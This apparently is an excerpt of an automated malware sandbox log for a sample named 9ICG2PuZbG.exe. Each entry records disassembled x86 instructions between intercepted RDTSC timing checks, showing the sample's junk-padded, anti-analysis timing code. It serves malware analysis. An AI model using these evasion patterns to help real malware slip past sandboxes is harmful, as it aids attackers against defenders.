Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B7070A second address: 4B7070E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B7070E second address: 4B7073D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F3A94CD4081h 0x00000011 call 00007F3A94CD4080h 0x00000016 pop ecx 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B7073D second address: 4B70758 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A9502B5F7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B70758 second address: 4B7077D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F3A94CD4085h 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B7077D second address: 4B70784 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B70784 second address: 4B707C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD4082h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F3A94CD407Dh 0x00000013 sub cx, 4F36h 0x00000018 jmp 00007F3A94CD4081h 0x0000001d popfd 0x0000001e mov bh, al 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B705C1 second address: 4B705DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B705DE second address: 4B70613 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD4081h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F3A94CD407Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F3A94CD407Eh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B70613 second address: 4B70625 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A9502B5EEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B70625 second address: 4B70629 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B70629 second address: 4B7064F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3A9502B5F9h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B7064F second address: 4B70653 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B70653 second address: 4B70659 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B70659 second address: 4B70671 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD407Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B70671 second address: 4B70675 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B70675 second address: 4B70692 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD4089h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B70692 second address: 4B70698 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B70698 second address: 4B706B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 pushad 0x0000000a movsx edi, si 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F3A94CD407Ch 0x00000014 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B803A0 second address: 4B803CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3A9502B5ECh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B803CC second address: 4B803D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4BC0010 second address: 4BC0016 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4BC0016 second address: 4BC001A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4BC001A second address: 4BC001E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4BC001E second address: 4BC0046 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F3A94CD4086h 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4BC0046 second address: 4BC004A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4BC004A second address: 4BC0050 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4BC0050 second address: 4BC0056 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B90545 second address: 4B90558 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD407Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B90558 second address: 4B90583 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edi 0x00000005 call 00007F3A9502B5EBh 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F3A9502B5F1h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B90583 second address: 4B90598 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD4081h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B90598 second address: 4B905A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A9502B5ECh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B905A8 second address: 4B905AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B70543 second address: 4B70549 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B70549 second address: 4B7054D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B900CA second address: 4B900E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A9502B5F4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B900E2 second address: 4B9010A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD407Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F3A94CD4084h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B9010A second address: 4B90111 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B90111 second address: 4B90143 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 jmp 00007F3A94CD4089h 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F3A94CD407Dh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B90143 second address: 4B9014A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B9014A second address: 4B9015B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b mov ax, FD77h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B9015B second address: 4B90160 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B90160 second address: 4B90166 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B90166 second address: 4B9016A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B9016A second address: 4B9016E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B9030C second address: 4B9031B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 movzx ecx, bx 0x00000008 popad 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B9031B second address: 4B90325 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ebx, 73D8DE6Eh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B90325 second address: 4B90388 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, ax 0x00000006 jmp 00007F3A9502B5EEh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007F3A9502B5F0h 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F3A9502B5EDh 0x00000021 sub ch, 00000056h 0x00000024 jmp 00007F3A9502B5F1h 0x00000029 popfd 0x0000002a jmp 00007F3A9502B5F0h 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B90388 second address: 4B9038E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B9038E second address: 4B90392 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4BB06DB second address: 4BB06F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD407Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ebx, esi 0x0000000f mov ax, 28E5h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4BB06F7 second address: 4BB06FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4BB06FD second address: 4BB0701 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4BB0701 second address: 4BB070D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4BB070D second address: 4BB073B instructions: 0x00000000 rdtsc 0x00000002 mov si, BF37h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov cl, 17h 0x0000000a popad 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e mov bl, 40h 0x00000010 jmp 00007F3A94CD407Eh 0x00000015 popad 0x00000016 xchg eax, ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a mov ebx, 3AD1E570h 0x0000001f mov ebx, 5FC7E89Ch 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4BB073B second address: 4BB0741 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4BB0741 second address: 4BB0763 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3A94CD4085h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4BB0763 second address: 4BB0778 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4BB0778 second address: 4BB077E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4BB077E second address: 4BB07CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 pushad 0x0000000a mov ebx, 7F686748h 0x0000000f jmp 00007F3A9502B5F1h 0x00000014 popad 0x00000015 mov eax, dword ptr [774365FCh] 0x0000001a jmp 00007F3A9502B5EEh 0x0000001f test eax, eax 0x00000021 pushad 0x00000022 mov si, C3FDh 0x00000026 mov ebx, ecx 0x00000028 popad 0x00000029 je 00007F3B0782E790h 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F3A9502B5EBh 0x00000036 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4BB07CF second address: 4BB0833 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F3A94CD407Fh 0x00000009 xor ch, FFFFFF9Eh 0x0000000c jmp 00007F3A94CD4089h 0x00000011 popfd 0x00000012 call 00007F3A94CD4080h 0x00000017 pop esi 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov ecx, eax 0x0000001d pushad 0x0000001e mov di, 6162h 0x00000022 mov ecx, edi 0x00000024 popad 0x00000025 xor eax, dword ptr [ebp+08h] 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F3A94CD4081h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4BB0833 second address: 4BB087D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F3A9502B5F7h 0x00000009 adc esi, 0C4867BEh 0x0000000f jmp 00007F3A9502B5F9h 0x00000014 popfd 0x00000015 mov ax, 3107h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c and ecx, 1Fh 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4BB087D second address: 4BB0881 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4BB0881 second address: 4BB08D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ch, 2Eh 0x00000008 popad 0x00000009 ror eax, cl 0x0000000b jmp 00007F3A9502B5EDh 0x00000010 leave 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F3A9502B5ECh 0x00000018 and ax, 5B18h 0x0000001d jmp 00007F3A9502B5EBh 0x00000022 popfd 0x00000023 call 00007F3A9502B5F8h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4BB0957 second address: 4BB0973 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD4081h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4BB0973 second address: 4BB0977 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4BB0977 second address: 4BB097D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4BB097D second address: 4BB09B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, 4227h 0x00000007 mov ebx, esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F3A9502B5F9h 0x00000012 xchg eax, ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov di, 081Eh 0x0000001a mov dx, 882Ah 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4BB09B0 second address: 4BB09CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A94CD4087h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B60016 second address: 4B6001C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B6001C second address: 4B60084 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov cx, bx 0x0000000d mov cx, bx 0x00000010 popad 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 mov dl, C2h 0x00000015 pushfd 0x00000016 jmp 00007F3A94CD407Eh 0x0000001b add al, 00000028h 0x0000001e jmp 00007F3A94CD407Bh 0x00000023 popfd 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 jmp 00007F3A94CD4086h 0x0000002c and esp, FFFFFFF8h 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F3A94CD4087h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B60084 second address: 4B600F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F3A9502B5F3h 0x00000013 adc ch, FFFFFFDEh 0x00000016 jmp 00007F3A9502B5F9h 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007F3A9502B5F0h 0x00000022 xor ah, FFFFFFD8h 0x00000025 jmp 00007F3A9502B5EBh 0x0000002a popfd 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B600F7 second address: 4B600FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B600FD second address: 4B60101 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B60101 second address: 4B6013C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD407Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F3A94CD4089h 0x00000011 xchg eax, ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F3A94CD407Dh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B6013C second address: 4B60158 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B60158 second address: 4B6015C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B6015C second address: 4B6016F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5EFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B6016F second address: 4B60187 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A94CD4084h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B60187 second address: 4B6018B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B6018B second address: 4B601B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F3A94CD407Eh 0x0000000e xchg eax, ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F3A94CD407Ah 0x00000018 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B601B1 second address: 4B601B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B601B7 second address: 4B601BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B601BD second address: 4B601C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B601C1 second address: 4B601E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [ebp+10h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov eax, edx 0x00000010 call 00007F3A94CD407Dh 0x00000015 pop eax 0x00000016 popad 0x00000017 rdtsc
